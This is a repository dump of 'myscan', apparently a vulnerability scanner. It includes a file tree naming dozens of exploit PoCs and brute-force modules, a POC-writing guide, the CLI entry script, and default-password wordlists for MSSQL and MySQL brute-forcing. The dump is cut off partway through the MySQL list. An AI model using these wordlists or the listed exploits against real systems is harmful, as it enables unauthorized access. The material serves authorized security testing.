├── .gitignore ├── LICENSE ├── README.md ├── docs ├── Class1-关于被动扫描器.md ├── Class2-进阶用法及开发指南.md ├── Class3-hostscan开发指南.md └── images │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── 5.png │ └── 流程图.png ├── myscan ├── TODO ├── __init__.py ├── __init__.pyc ├── cli.py ├── config.py ├── data │ ├── brute │ │ ├── mssql_pass │ │ ├── mssql_user │ │ ├── mysql_pass │ │ ├── mysql_user │ │ ├── password-top100.txt │ │ ├── redis_pass │ │ ├── smb_pass │ │ ├── smb_user │ │ ├── ssh_pass │ │ └── ssh_user │ ├── common │ │ └── dns_servers.txt │ └── dir │ │ └── dicc.txt ├── exp │ ├── dns │ │ └── dns_zone_transfer.py │ └── shiro │ │ └── shiro_find_key.py ├── htmllib │ ├── prism-http.min.js │ ├── prism-javascript.min.js │ ├── prism.min.css │ ├── prism.min.js │ └── raven.min.js ├── lib │ ├── __init__.py │ ├── __init__.pyc │ ├── bin │ │ └── weblogic │ │ │ ├── CVE-2020-14645.jar │ │ │ ├── CVE-2020-2555.jar │ │ │ └── CVE-2020-2883.jar │ ├── controller │ │ ├── __init__.py │ │ └── start.py │ ├── core │ │ ├── __init__.py │ │ ├── __init__.pyc │ │ ├── base.py │ │ ├── block_info.py │ │ ├── common.py │ │ ├── common_reverse.py │ │ ├── conn.py │ │ ├── const.py │ │ ├── data.py │ │ ├── datatype.py │ │ ├── dns.py │ │ ├── htmlout.py │ │ ├── log.py │ │ ├── options.py │ │ ├── plugin.py │ │ ├── pythonplugin.py │ │ ├── pythonpoc.py │ │ ├── register.py │ │ ├── status.py │ │ └── threads.py │ ├── helper │ │ ├── __init__.py │ │ ├── helper_socket.py │ │ ├── helper_sqli.py │ │ └── request.py │ ├── hostscan │ │ ├── __init__.py │ │ ├── common.py │ │ ├── input_sour │ │ │ ├── __init__.py │ │ │ ├── from_json_import.py │ │ │ ├── from_nmap_text_import.py │ │ │ └── from_nmap_xml_import.py │ │ ├── pocbase.py │ │ └── start_input.py │ ├── parse │ │ ├── __init__.py │ │ ├── cmd_line_parser.py │ │ ├── dictdata_parser.py │ │ └── response_parser.py │ ├── patch │ │ ├── ipv6_patch.py │ │ ├── paramiko_patch.py │ │ └── requests_urlencode_patch.py │ └── scriptlib │ │ ├── __init__.py │ │ ├── java │ │ └── java_serialize.py │ │ ├── 
sqli │ │ └── diffpage.py │ │ ├── ssti │ │ ├── __init__.py │ │ ├── closures.py │ │ ├── const.py │ │ ├── engines │ │ │ ├── __init__.py │ │ │ ├── dot.py │ │ │ ├── dust.py │ │ │ ├── ejs.py │ │ │ ├── erb.py │ │ │ ├── freemarker.py │ │ │ ├── jinja2.py │ │ │ ├── mako.py │ │ │ ├── marko.py │ │ │ ├── nunjucks.py │ │ │ ├── pug.py │ │ │ ├── slim.py │ │ │ ├── smarty.py │ │ │ ├── tornado.py │ │ │ ├── twig.py │ │ │ └── velocity.py │ │ ├── importssti.py │ │ ├── languages │ │ │ ├── bash.py │ │ │ ├── java.py │ │ │ ├── javascript.py │ │ │ ├── php.py │ │ │ ├── python.py │ │ │ └── ruby.py │ │ ├── plugin.py │ │ └── rand.py │ │ └── xss │ │ ├── __init__.py │ │ ├── common.py │ │ ├── const.py │ │ ├── generator.py │ │ ├── jsContexter.py │ │ └── utils.py ├── plugins │ ├── __init__.py │ ├── hostscan │ │ └── __init__.py │ └── webscan │ │ ├── __init__.py │ │ └── es_import.py ├── pocs │ ├── __init__.py │ ├── perfile │ │ ├── __template.py │ │ ├── myscan_crlf.py │ │ ├── myscan_dns_zone_transfer.py │ │ ├── myscan_editfile_leak.py │ │ ├── myscan_getpage.py │ │ ├── myscan_source_code_disclosure.py │ │ ├── myscan_webpack_leak.py │ │ ├── poc_bash-cve-2014-6271.py │ │ ├── poc_rails_cve-2019-5418_2019.py │ │ ├── poc_struts2-057.py │ │ ├── poc_struts2_016.py │ │ ├── poc_struts2_032.py │ │ └── poc_struts2_dev.py │ ├── perfolder │ │ ├── __init__.py │ │ ├── __poc_dedecms-cve-2018-6910_2018.py │ │ ├── __poc_dedecms-cve-2018-7700-rce_2018.py │ │ ├── __template.py │ │ ├── apache │ │ │ ├── __init__.py │ │ │ ├── poc_apache-flink-upload-rce_2020.py │ │ │ ├── poc_apache-ofbiz-cve-2018-8033-xxe_2018.py │ │ │ ├── poc_apache-ofbiz-cve-2020-9496-xml-deserialization_2020.py │ │ │ ├── poc_apache_nifi_rce_2020.py │ │ │ └── poc_apache_unomi_cve-2020-13942_2020.py │ │ ├── apereo │ │ │ ├── __init__.py │ │ │ └── poc_apereo_cas_rce_2019.py │ │ ├── axis │ │ │ ├── __init__.py │ │ │ └── poc_axis_cve-2019-0227_2019.py │ │ ├── baota │ │ │ ├── __init__.py │ │ │ └── poc_baota_pmaunauth_2020.py │ │ ├── basework │ │ │ ├── __init__.py │ 
│ │ └── myscan_getpage.py │ │ ├── bullwark │ │ │ └── poc_bullwark-momentum-lfi_2019.py │ │ ├── cacti │ │ │ ├── __init__.py │ │ │ └── poc_cacti-weathermap-file-write_2019.py │ │ ├── cisco │ │ │ ├── __init__.py │ │ │ ├── pcc_cisco_route_cve-2019-1653_2019.py │ │ │ ├── poc_cisco_asa_cve-2020-3452.py │ │ │ └── poc_cisco_xenmobile_cve-2020-8209_2020.py │ │ ├── citrix │ │ │ ├── __init__.py │ │ │ ├── poc_citrix-cve-2019-19781-path-traversal_2019.py │ │ │ ├── poc_citrix-cve-2020-8191-xss_2020.py │ │ │ ├── poc_citrix-cve-2020-8193-unauthorized.py │ │ │ └── poc_citrix-cve-2020-8982-unauth-fileread_2020.py │ │ ├── coldfusion │ │ │ ├── __init__.py │ │ │ └── poc_coldfusion-cve-2010-2861-lfi_2010.py │ │ ├── confluence │ │ │ ├── __init__.py │ │ │ └── poc_confluence-cve-2019-3396-lfi_2019.py │ │ ├── consul │ │ │ ├── __init__.py │ │ │ └── poc_consul-rce_2020.py │ │ ├── coremail │ │ │ ├── __init__.py │ │ │ └── poc_coremail-cnvd-2019-16798_2019.py │ │ ├── couchcms │ │ │ ├── __init__.py │ │ │ └── poc_couchcms-cve-2018-7662_2018.py │ │ ├── couchdb │ │ │ ├── __init__.py │ │ │ ├── poc_couchdb-cve-2017-12635_2017.py │ │ │ └── poc_couchdb-unauth_2016.py │ │ ├── dell │ │ │ └── poc_dell_idrac_weak_passwd_2020.py │ │ ├── discuz │ │ │ ├── __init__.py │ │ │ ├── poc_discuz-v72-sqli_2018.py │ │ │ ├── poc_discuz-wechat-plugins-unauth_2016.py │ │ │ └── poc_discuz-wooyun-2010-080723_2010.py │ │ ├── dlink │ │ │ ├── __init__.py │ │ │ ├── poc_dlink-850l-info-leak_2018.py │ │ │ ├── poc_dlink-cve-2019-16920-rce_2019.py │ │ │ └── poc_dlink-cve-2019-17506_2019.py │ │ ├── docker │ │ │ ├── __init__.py │ │ │ ├── poc_docker-api-unauthorized-rce_2017.py │ │ │ └── poc_docker-registry-api-unauth_2017.py │ │ ├── druid │ │ │ ├── __init__.py │ │ │ └── poc_druid-monitor-unauth_2019.py │ │ ├── drupal │ │ │ ├── __init__.py │ │ │ └── poc_drupal-cve-2019-6340_2019.py │ │ ├── ecology │ │ │ ├── __init__.py │ │ │ ├── poc_ecology-filedownload-directory-traversal_2018.py │ │ │ ├── poc_ecology-javabeanshell-rce_2019.py │ │ │ 
├── poc_ecology-springframework-directory-traversal_2019.py │ │ │ ├── poc_ecology-syncuserinfo-sqli_2019.py │ │ │ ├── poc_ecology-validate-sqli_2019.py │ │ │ ├── poc_ecology-workflowcentertreedata-sqli_2019.py │ │ │ └── poc_ecology_db_leak_2020.py │ │ ├── ecshop │ │ │ ├── __init__.py │ │ │ └── poc_ecshop-360-rce_2019.py │ │ ├── elasticsearch │ │ │ ├── __init__.py │ │ │ ├── poc_elasticsearch-cve-2014-3120_2014.py │ │ │ ├── poc_elasticsearch-cve-2015-1427_2015.py │ │ │ ├── poc_elasticsearch-cve-2015-3337-lfi_2015.py │ │ │ └── poc_elasticsearch-unauth.py │ │ ├── exacqVision │ │ │ └── poc_exacqVision_cve-2020-9047_2020.py │ │ ├── f5 │ │ │ ├── __init__.py │ │ │ └── poc_f5-tmui-cve-2020-5902-rce_2020.py │ │ ├── finecms │ │ │ ├── __init__.py │ │ │ └── poc_finecms-sqli_2019.py │ │ ├── finereport │ │ │ ├── __init__.py │ │ │ └── poc_finereport-directory-traversal_2019.py │ │ ├── fortigate │ │ │ └── poc_fortigate_cve-2018-13379_2018.py │ │ ├── hadoop │ │ │ ├── __init__.py │ │ │ └── poc_hadoop_unauth_acc_2018.py │ │ ├── hikvision │ │ │ ├── __init__.py │ │ │ └── poc_hikvision_xss_2020.py │ │ ├── iis │ │ │ ├── __init__.py │ │ │ ├── poc_iis_6.0_cve-2017-7269.py │ │ │ └── poc_iis_6.0_shortname.py │ │ ├── info │ │ │ ├── __init__.py │ │ │ ├── myscan_baseline.py │ │ │ ├── myscan_dirscan.py │ │ │ ├── myscan_put_upload.py │ │ │ ├── myscan_sensitive_file_leak.py │ │ │ ├── poc_docker_registry_listing_2019.py │ │ │ ├── poc_front-page-misconfig.py │ │ │ ├── poc_jira_service-desk-signup.py │ │ │ ├── poc_jira_unauthenticated-projects.py │ │ │ ├── poc_springboot-actuators.py │ │ │ └── poc_webeditor_found.py │ │ ├── jboss │ │ │ ├── __init__.py │ │ │ └── poc_jboss_found_2020.py │ │ ├── jenkins │ │ │ └── poc_jenkins_rce_2019.py │ │ ├── jira │ │ │ ├── __init__.py │ │ │ ├── poc_jira-cve-2019-11581_2019.py │ │ │ ├── poc_jira-ssrf-cve-2019-8451_2019.py │ │ │ └── poc_jira_userenum_cve-2020-14181_2020.py │ │ ├── jolokia │ │ │ ├── __init__.py │ │ │ └── poc_jolokia_CVE-2018-1000130_2018.py │ │ ├── 
joomla │ │ │ ├── __init__.py │ │ │ ├── poc_joomla-cnvd-2019-34135-rce_2019.py │ │ │ └── poc_joomla-cve-2017-8917-sqli_2017.py │ │ ├── kibana │ │ │ └── poc_kibana-unauth_2018.py │ │ ├── kong │ │ │ ├── __init__.py │ │ │ └── poc_kong-cve-2020-11710-unauth_2020.py │ │ ├── kylin │ │ │ └── poc_kylin_cve-2020-13937_2020.py │ │ ├── lanproxy │ │ │ └── poc_lanproxy_fileread_2021.py │ │ ├── laravel │ │ │ ├── __init__.py │ │ │ └── poc_laravel-debug-info-leak_2020.py │ │ ├── myscan_redirect.py │ │ ├── myscan_swf_xss.py │ │ ├── nexus │ │ │ ├── __init__.py │ │ │ ├── poc_nexus-cve-2019-7238_2019.py │ │ │ └── poc_nexus-default-password_2020.py │ │ ├── nginx │ │ │ └── poc_nginx-module-vts-xss.py │ │ ├── nsfocus │ │ │ └── __nsfocus_uts_unauth_2020.py │ │ ├── oracle │ │ │ └── oracle_ebs-bispgrapgh-file-read_2020.py │ │ ├── phpstudy │ │ │ ├── __init__.py │ │ │ ├── poc_phpstudy-nginx-wrong-resolve_2020.py │ │ │ └── poc_phpstudy_backdoor_2019.py │ │ ├── poc_user-agent-shell-shock_2018.py │ │ ├── private │ │ │ └── __init__.py │ │ ├── pulsesecure │ │ │ └── poc_pulsesecure_sslvpn_cve-2019-11510_2019.py │ │ ├── qnap │ │ │ ├── __init__.py │ │ │ └── poc_qnap-cve-2019-7192_2019.py │ │ ├── rails │ │ │ ├── __init__.py │ │ │ └── poc_rails-cve-2018-3760_2018.py │ │ ├── saltstack │ │ │ └── poc_saltstack-cve-2020-16846_2020.py │ │ ├── sangfor │ │ │ ├── __init__.py │ │ │ ├── poc_sangfor_edr_rce_2020.py │ │ │ ├── poc_sangfor_edr_rce_202009_2020.py │ │ │ ├── poc_sangfor_edr_unauth_2020.py │ │ │ └── poc_sangfor_rce_2020.py │ │ ├── sap │ │ │ ├── __init__.py │ │ │ ├── poc_sap_cve-2017-12637_2017.py │ │ │ └── poc_sap_cve-2020-6287_2020.py │ │ ├── seeyon │ │ │ ├── __init__.py │ │ │ ├── poc_seeyon_u8_sqli_2020.py │ │ │ └── poc_seeyou_a8_getshell_2019.py │ │ ├── sharepoint │ │ │ └── poc_sharepoint_rce_cve-2020-1147_2020.py │ │ ├── solr │ │ │ ├── __init__.py │ │ │ ├── poc_solr-velocity-template-rce_2019.py │ │ │ ├── poc_solr_cve-2017-12629-xxe_2017.py │ │ │ └── poc_solr_cve-2019-0193_2019.py │ │ ├── sonarqube │ 
│ │ └── poc_sonarqube_api_access.py │ │ ├── spark │ │ │ ├── __init__.py │ │ │ └── poc_spark_unacc_2018.py │ │ ├── spring │ │ │ ├── __init__.py │ │ │ ├── poc_spring-cloud-cve-2020-5410_2020.py │ │ │ ├── poc_spring-cloud-netflix-hystrix-dashboard_CVE-2020-5412_2020.py │ │ │ ├── poc_spring_cloud-cve-2020-5405_2020.py │ │ │ ├── poc_spring_cve-2016-4977_2016.py │ │ │ ├── poc_spring_cve-2019-3799_2019.py │ │ │ ├── poc_spring_xss_2020.py │ │ │ ├── poc_springboot-actuators-jolokia-xxe.py │ │ │ └── poc_springboot_h2_db_rce_2020.py │ │ ├── struts │ │ │ ├── __init__.py │ │ │ ├── poc_struts2_033.py │ │ │ ├── poc_struts2_037.py │ │ │ ├── poc_struts2_045.py │ │ │ ├── poc_struts2_046.py │ │ │ └── poc_struts2_052.py │ │ ├── supervisord │ │ │ ├── __init__.py │ │ │ └── poc_supervisord-cve-2017-11610_2017.py │ │ ├── symantec │ │ │ └── poc_symantec-messaging-gateway_lfi_2020.py │ │ ├── terramaster │ │ │ ├── __init__.py │ │ │ └── poc_terramaster_rce_cve-2020-28188.py │ │ ├── thinkadmin │ │ │ └── poc_thinkadmin_unauth_and_read_file.py │ │ ├── thinkcmf │ │ │ ├── __init__.py │ │ │ ├── poc_thinkcmf-lfi_2020.py │ │ │ └── poc_thinkcmf_rce_2019.py │ │ ├── thinkphp │ │ │ ├── __init__.py │ │ │ └── poc_thinkphp_rce_all_2020.py │ │ ├── tomcat │ │ │ ├── __init__.py │ │ │ ├── poc_tomcat-manager-pathnormalization.py │ │ │ ├── poc_tomcat_cve-2017-12615_2017.py │ │ │ └── poc_tomcat_cve-2018-11759_2018.py │ │ ├── tongda │ │ │ ├── __init__.py │ │ │ ├── poc_tongda_oa_rce1_2020.py │ │ │ └── poc_tongda_oa_rce_2020.py │ │ ├── ueditor │ │ │ └── poc_ueditor_cnvd-2017-20077-file-upload_2020.py │ │ ├── vbulletin │ │ │ ├── poc_vbulletin-cve-2019-16759_2019.py │ │ │ └── poc_vbulletin-cve-2019-16759_2019_bypass.py │ │ ├── vmware │ │ │ └── poc_vmware_vcenter_readfile_2020.py │ │ ├── weaver │ │ │ └── poc_weaver-ebridge-file-read_2020.py │ │ ├── weblogic │ │ │ ├── __init__.py │ │ │ ├── poc_weblogic_cve-2017-10271_2017.py │ │ │ ├── poc_weblogic_cve-2019-2725_v10_2019.py │ │ │ ├── poc_weblogic_cve-2019-2725_v12_2019.py 
│ │ │ ├── poc_weblogic_cve-2019-2729_1_2019.py │ │ │ ├── poc_weblogic_cve-2019-2729_2_2019.py │ │ │ ├── poc_weblogic_cve-2020-14882_2020.py │ │ │ └── poc_weblogic_ssrf_2018.py │ │ ├── wordpress │ │ │ ├── __init__.py │ │ │ ├── poc_wordpress-duplicator-path-traversal.py │ │ │ ├── poc_wordpress_configfile.py │ │ │ └── poc_wordpress_wordfence_xss.py │ │ ├── xunchi │ │ │ └── poc_xunchi-cnvd-2020-23735-file-read_2020.py │ │ ├── xxl-job │ │ │ └── poc_xxl-job_unauth_rce_2020.py │ │ ├── yonyou │ │ │ └── poc_yonyou_rce_2020.py │ │ ├── youphptube │ │ │ └── poc_youphptube-encoder-cve-2019-5129_2019.py │ │ ├── zabbix │ │ │ ├── __init__.py │ │ │ ├── poc_zabbix_authentication-bypass_2016.py │ │ │ └── poc_zabbix_cve-2016-10134_2016.py │ │ ├── zeroshell │ │ │ ├── __init__.py │ │ │ └── poc_zeroshell_cve-2019-12725_2020.py │ │ └── zyxel │ │ │ └── poc_zyxel_cve-2020-9054_2020.py │ ├── perscheme │ │ ├── __init__.py │ │ ├── __myscan_analyze_serialize_parameter.py │ │ ├── __myscan_js_sensitive_content.py │ │ ├── __poc_fastjson_deserialization_rce_encode_2020.py │ │ ├── __poc_fastjson_rce.py │ │ ├── __template.py │ │ ├── info │ │ │ ├── __init__.py │ │ │ ├── myscan_baseline.py │ │ │ └── myscan_sensitive_msg_transfer.py │ │ ├── myscan_cmd_inject.py │ │ ├── myscan_cors.py │ │ ├── myscan_host_inject.py │ │ ├── myscan_jackson_cve-2019-12384_2019.py │ │ ├── myscan_jackson_cve-2020-35728.py │ │ ├── myscan_jsonp.py │ │ ├── myscan_phpcode_inject.py │ │ ├── myscan_phppath_leak.py │ │ ├── myscan_power_unauth.py │ │ ├── myscan_redirect.py │ │ ├── myscan_sqli_boolen.py │ │ ├── myscan_sqli_error.py │ │ ├── myscan_sqli_timeblind.py │ │ ├── myscan_ssrf.py │ │ ├── myscan_ssti.py │ │ ├── myscan_struts2_061.py │ │ ├── myscan_xss.py │ │ ├── myscan_xxe.py │ │ ├── others_fastjson_dnslog_found.py │ │ ├── others_jackson_fastjson_error_found.py │ │ ├── others_webdav.py │ │ ├── poc_apereo_cas_rce_2019.py │ │ ├── poc_fastjson_deserialization_rce_2020.py │ │ ├── poc_shiro_rce_2019.py │ │ ├── 
poc_srping_cve-2018-1273_2018.py │ │ ├── poc_struts2-053.py │ │ ├── poc_struts2_029.py │ │ ├── poc_struts2_048.py │ │ ├── shiro │ │ │ ├── __init__.py │ │ │ └── poc_shiro_rce_2019.py │ │ └── tomcat │ │ │ └── poc_tomcat-manager-pathnormalization_verify_2020.py │ ├── perserver │ │ ├── __init__.py │ │ ├── __ssh_brute.py │ │ ├── __template.py │ │ ├── mongodb_unauth.py │ │ ├── mssql_brute.py │ │ ├── mysql_brute.py │ │ ├── redis_brute.py │ │ ├── rmi_deserialization.py │ │ ├── samba_cve_2017-7494.py │ │ ├── smb_brute.py │ │ ├── smb_info.py │ │ ├── smb_ms17010.py │ │ ├── weblogic_cve_2020_14645.py │ │ ├── weblogic_cve_2020_2555.py │ │ └── weblogic_cve_2020_2883.py │ └── search.py ├── reverse │ ├── reverse.py │ ├── reverse_dns.py │ ├── reverse_http.py │ ├── reverse_ldap.py │ └── reverse_rmi.py ├── tests │ ├── TODO │ ├── __init__.py │ ├── codetest.py │ ├── es_test.py │ ├── getdatafromredis.py │ ├── ignore_test.py │ └── jnius_example.py └── web │ ├── app.py │ ├── static │ ├── bugs │ │ ├── bootstrap │ │ │ ├── css │ │ │ │ ├── bootstrap-theme.css │ │ │ │ ├── bootstrap-theme.css.map │ │ │ │ ├── bootstrap-theme.min.css │ │ │ │ ├── bootstrap.css │ │ │ │ ├── bootstrap.css.map │ │ │ │ └── bootstrap.min.css │ │ │ ├── fonts │ │ │ │ ├── glyphicons-halflings-regular.eot │ │ │ │ ├── glyphicons-halflings-regular.svg │ │ │ │ ├── glyphicons-halflings-regular.ttf │ │ │ │ ├── glyphicons-halflings-regular.woff │ │ │ │ └── glyphicons-halflings-regular.woff2 │ │ │ └── js │ │ │ │ ├── bootstrap.js │ │ │ │ ├── bootstrap.min.js │ │ │ │ └── npm.js │ │ ├── css │ │ │ └── style.css │ │ └── js │ │ │ ├── jquery-1.11.3.min.js │ │ │ ├── jquery-1.4.2.min.js │ │ │ └── jquery.twbsPagination.js │ ├── css │ │ └── prism.min.css │ ├── drops │ │ ├── css │ │ │ ├── 95e46879.main.css │ │ │ └── bootstrap.min.css │ │ └── js │ │ │ ├── bootstrap.min.js │ │ │ ├── jquery.js │ │ │ └── jquery.min.js │ └── js │ │ ├── prism-http.min.js │ │ ├── prism-javascript.min.js │ │ └── prism.min.js │ └── templates │ ├── base.html │ ├── 
error.html │ ├── index.html │ ├── index1.html │ ├── search.html │ └── search1.html ├── myscan_burp_extension.jar └── requirements.txt /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | .idea 3 | TODO 4 | tests/ 5 | __pycache__/ 6 | private/ 7 | codetest.py 8 | fuzz/ 9 | poc_thinkphp_logfile_2020.py 10 | -------------------------------------------------------------------------------- /docs/Class3-hostscan开发指南.md: -------------------------------------------------------------------------------- 1 | 此模块待开发... 2 | 3 | ### Example dict 4 | 5 | ``` 6 | { 7 | "filter": false, # redis是否去重 8 | "scan": false, # 是否再次用nmap确定服务,当为True时,service字段将无效 9 | "addr": "1.1.1.1", # 支持域名 10 | "port": 80, 11 | "type": "tcp", 12 | "service": { # nmap识别出来服务以及版本 13 | "smb": "6.1", 14 | "unknown": "" 15 | } 16 | } 17 | ``` 18 | 19 | 20 | ### POC编写 21 | 22 | 程序已有多种样例,可先阅读已编写好的代码。 23 | > 在pocs目录,共perfile,perfolder,perscheme三个目录,每个目录下均有__template.py文件,此文件为模版文件,编写poc时,复制一份重命名即可。 24 | > 25 | > 在POC文件里,类名必须为POC,必须包含一个self.result用来保存结果,和一个verify方法,如模板所示主要编写在verify方法里面pass部分。 26 | > 27 | > 建议使用内置的requests模块,具有统计失败次数,搜索功能。 28 | > 29 | > 成功的结果以dict数据保存在list类型self.result里,dict数据需按照如下格式来 30 | > 31 | > ``` 32 | self.result.append({ 33 | "name": self.name, 34 | "url": "http://example.com/test.php", 35 | "level": self.level, # 0:Low 1:Medium 2:High 36 | "detail": { 37 | "vulmsg": self.vulmsg, 38 | } 39 | }) 40 | >``` 41 | >dict数据必须包含"name","url","level","detail"四个key,其中detail字典里可自定义数据。 42 | > 43 | > 44 | 45 | -------------------------------------------------------------------------------- /docs/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/docs/images/1.png -------------------------------------------------------------------------------- /docs/images/2.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/docs/images/2.png -------------------------------------------------------------------------------- /docs/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/docs/images/3.png -------------------------------------------------------------------------------- /docs/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/docs/images/4.png -------------------------------------------------------------------------------- /docs/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/docs/images/5.png -------------------------------------------------------------------------------- /docs/images/流程图.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/docs/images/流程图.png -------------------------------------------------------------------------------- /myscan/TODO: -------------------------------------------------------------------------------- 1 | 1.https://www.anquanke.com/post/id/184668 2 | 2.反序列化回显研究 3 | 3.cas插件编写 4 | 4.spring cve-2018-1273 回显 -------------------------------------------------------------------------------- /myscan/__init__.py: -------------------------------------------------------------------------------- 1 | __title__ = 'myscan' 2 | __version__ = '2.0.0' 3 | __author__ = 'caicai' 4 | __author_email__ = 'icaibai@foxmail.com' 5 | __license__ = 'GPL 2.0' 6 | __copyright__ = 'Copyright 2020' 7 | 
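# NOTE(review): reassigning __name__/__package__ inside a package __init__ is
# unusual — the import system already sets both to 'myscan' when the package is
# imported; these lines only matter if the file is executed as a script.
__name__ = 'myscan'
__package__ = 'myscan'

--------------------------------------------------------------------------------
/myscan/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/__init__.pyc
--------------------------------------------------------------------------------
/myscan/cli.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# @Time : 2020-02-14
# @Author : caicai
# @File : cli.py
"""Command-line entry point for myscan.

Parses the command line and dispatches on the chosen sub-command:
``webscan``/``hostscan`` run the scanner, ``reverse`` runs the reverse
module.  The shebang above is the fixed form (``#!``); the original had a
space after ``#``, which the kernel does not treat as an interpreter line.

NOTE(review): compiled ``__init__.pyc`` files are committed alongside the
sources in this tree (myscan/, myscan/lib/, myscan/lib/core/).  Bytecode in a
source tree is not reviewable and can drift from the ``.py`` next to it;
``.gitignore`` already excludes ``__pycache__/``, so these can be dropped.
"""
import os
import sys

try:
    import myscan
except ImportError:
    # Running from a source checkout without the package installed: put the
    # repository root (parent of this file's directory) on sys.path so the
    # absolute ``myscan.…`` imports below resolve.
    sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))

from myscan.lib.core.common import set_paths
from myscan.lib.core.conn import set_conn, cleandb
from myscan.lib.core.options import init_options
from myscan.lib.controller.start import process_start, start
from myscan.lib.core.status import start_count_status
from myscan.lib.core.htmlout import start_write_results
from myscan.lib.core.data import cmd_line_options, logger
from myscan.reverse.reverse import reverse_start
from myscan.lib.hostscan.start_input import start_input


def main():
    """Program entry point.

    Records the package directory via ``set_paths``, parses options with
    ``init_options``, then dispatches on ``cmd_line_options.command``:

    * ``webscan`` / ``hostscan`` — open the datastore connection
      (``set_conn``), clean it (``cleandb``), start the status counter and
      the HTML result writer, start the input reader, then run
      ``process_start`` and ``start``.
    * ``reverse`` — run ``reverse_start`` only.

    Any other command value is logged and nothing is started (the original
    silently fell through).  Returns nothing.
    """
    set_paths(os.path.dirname(os.path.realpath(__file__)))
    init_options()
    if cmd_line_options.command in ["webscan", "hostscan"]:
        logger.info("Start {} mode".format(cmd_line_options.command))
        set_conn()
        # cleandb() runs unconditionally, so whatever a previous run left in
        # the datastore is discarded before scanning — presumably intended;
        # confirm before pointing the tool at a shared datastore instance.
        cleandb()
        start_count_status()
        start_write_results()
        start_input()
        process_start()
        start()
    elif cmd_line_options.command == "reverse":
        logger.info("Start reverse mode")
        reverse_start()
    else:
        # No recognised sub-command (presumably the parser returned None);
        # make the no-op visible instead of exiting silently.
        logger.info("Nothing to do: unknown command {!r}".format(cmd_line_options.command))


if __name__ == '__main__':
    main()

--------------------------------------------------------------------------------
/myscan/data/brute/mssql_pass: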
-------------------------------------------------------------------------------- 1 | sa 2 | sa@123 3 | Sa 4 | sa123 5 | 000000 6 | 000000000 7 | 0000000000 8 | 0000000000000000 9 | 0123456789 10 | 110120119 11 | 111111 12 | 111111111 13 | 1111111111 14 | 1111111111111111 15 | 123 16 | 123123 17 | 123123123 18 | 1233211234567 19 | 1234554321 20 | 123456 21 | 123456. 22 | 123456.. 23 | 123456789 24 | 123456789. 25 | 123456789.. 26 | 1234567890 27 | 12345678900 28 | 1234567891 29 | 12345678910 30 | 1234567891234567 31 | 1234567899 32 | 123456789a 33 | 123456789abc 34 | 123456789q 35 | 123456789qq 36 | 123456a 37 | 123456aa 38 | 123456abc 39 | 123456asd 40 | 123456q 41 | 123456qq 42 | 123698745 43 | 123abc 44 | 1314520520 45 | 135792468 46 | 1357924680 47 | 147258369 48 | 1472583690 49 | 19881230 50 | 1qaz2wsx 51 | 253013 52 | 5201314 53 | 5201314520 54 | 52013145201314 55 | 5841314520 56 | 741852963 57 | 7708801314520 58 | 789456123 59 | 7894561230 60 | 987654321 61 | 9876543210 62 | Passw0rd 63 | Password 64 | Password123 65 | Redis 66 | Redis123 67 | Redis@123 68 | Root@123 69 | a123123 70 | a123456 71 | a12345678 72 | a123456789 73 | a5201314 74 | aa123456 75 | aa123456789 76 | aaa123456 77 | abc123 78 | abc123456 79 | abc123456789 80 | abcd123 81 | abcd1234 82 | abcd123456 83 | admin 84 | admin123 85 | admin@123 86 | aini1314 87 | as123456 88 | asd123 89 | asd123456 90 | asdfghjkl 91 | foobared 92 | foobared123 93 | foobared123456 94 | foobared@123 95 | password123 96 | q123456 97 | q123456789 98 | qaz123456 99 | qazwsxedc 100 | qq123456 101 | qq123456789 102 | qq5201314 103 | qwe123 104 | qwe123456 105 | qwerty 106 | qwertyuiop 107 | redis 108 | redis123 109 | redis@123 110 | root 111 | root123 112 | root@123 113 | sunshine 114 | test 115 | test123 116 | w123456 117 | w123456789 118 | wang123456 119 | woaini 120 | woaini123 121 | !QAZ@WSX 122 | !QAZ2wsx 123 | woaini1314 124 | woaini1314520 125 | woaini520 126 | woaini521 127 | www123456 128 | z123456 129 | 
z123456789 130 | zxc123 131 | zxc123456 132 | zxcvbnm 133 | zxcvbnm123 -------------------------------------------------------------------------------- /myscan/data/brute/mssql_user: -------------------------------------------------------------------------------- 1 | sa -------------------------------------------------------------------------------- /myscan/data/brute/mysql_pass: -------------------------------------------------------------------------------- 1 | mysql 2 | Mysql 3 | mysql@123 4 | Mysql@123 5 | 000000 6 | 000000000 7 | 0000000000 8 | 0000000000000000 9 | 0123456789 10 | 110120119 11 | 111111 12 | 111111111 13 | 1111111111 14 | 1111111111111111 15 | 123 16 | 123123 17 | 123123123 18 | 1233211234567 19 | 1234554321 20 | 123456 21 | 123456. 22 | 123456.. 23 | 123456789 24 | 123456789. 25 | 123456789.. 26 | 1234567890 27 | 12345678900 28 | 1234567891 29 | 12345678910 30 | 1234567891234567 31 | 1234567899 32 | 123456789a 33 | 123456789abc 34 | 123456789q 35 | 123456789qq 36 | 123456a 37 | 123456aa 38 | 123456abc 39 | 123456asd 40 | 123456q 41 | 123456qq 42 | 123698745 43 | 123abc 44 | 1314520520 45 | 135792468 46 | 1357924680 47 | 147258369 48 | 1472583690 49 | 19881230 50 | 1qaz2wsx 51 | 253013 52 | 5201314 53 | 5201314520 54 | 52013145201314 55 | 5841314520 56 | 741852963 57 | 7708801314520 58 | 789456123 59 | 7894561230 60 | 987654321 61 | 9876543210 62 | Passw0rd 63 | Password 64 | Password123 65 | Redis 66 | 